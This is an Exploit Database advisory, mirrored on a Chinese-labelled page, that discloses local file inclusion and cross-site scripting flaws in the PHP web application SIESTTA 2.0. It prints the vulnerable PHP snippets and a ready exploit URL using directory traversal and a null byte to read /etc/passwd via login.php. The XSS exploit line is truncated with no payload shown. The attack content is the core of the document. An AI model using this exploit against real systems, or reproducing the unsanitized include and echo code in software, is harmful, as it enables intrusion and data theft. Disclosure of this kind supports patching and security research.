SIESTTA 2.0 – Local File Inclusion / Cross-Site Scripting

• Exploit Database
• 34 阅读

• 作者： JosS
  日期： 2010-04-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12260/

• ####################################################################
  # SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
  # download: http://ramoncastro.es/siestta_old/
  #
  # Author: Jose Luis Gongora Fernandez 'aka' JosS
  # mail: sys-project[at]hotmail[dot]com
  # site: http://www.hack0wn.com/
  # team: Spanish Hackers Team - [SHT]
  #
  # Hack0wn Security Project!!
  #
  # This was written for educational purpose. Use it at your own risk.
  # Author will be not responsible for any damage.
  #
  ####################################################################
  #
  # "need" register_globals = On
  #
  ####################################################################
  
  
  - [#LFI] <login.php>
  
  <?php
  
  require('idioma/'.$idioma.'');
  ...
  ?>
  
  !EXPLOIT: /login.php?idioma=/../../../../../../../../../../../etc/passwd%00
  
  - [#XSS] <carga_foto_al.php>
  
  <?
  ...
  $usuario = $_GET['usuario'];
  $imagen = 'admin/fotos_al/'.$usuario.'.jpg';
  echo '<p style="text-align:center;">
  <img class="foto" src="https://www.exploit-db.com/exploits/12260/'.$imagen.'" alt="'.$usuario.'" /></p>
  ...
  ?>
  
  !EXPLOIT: /carga_foto_al.php?usuario=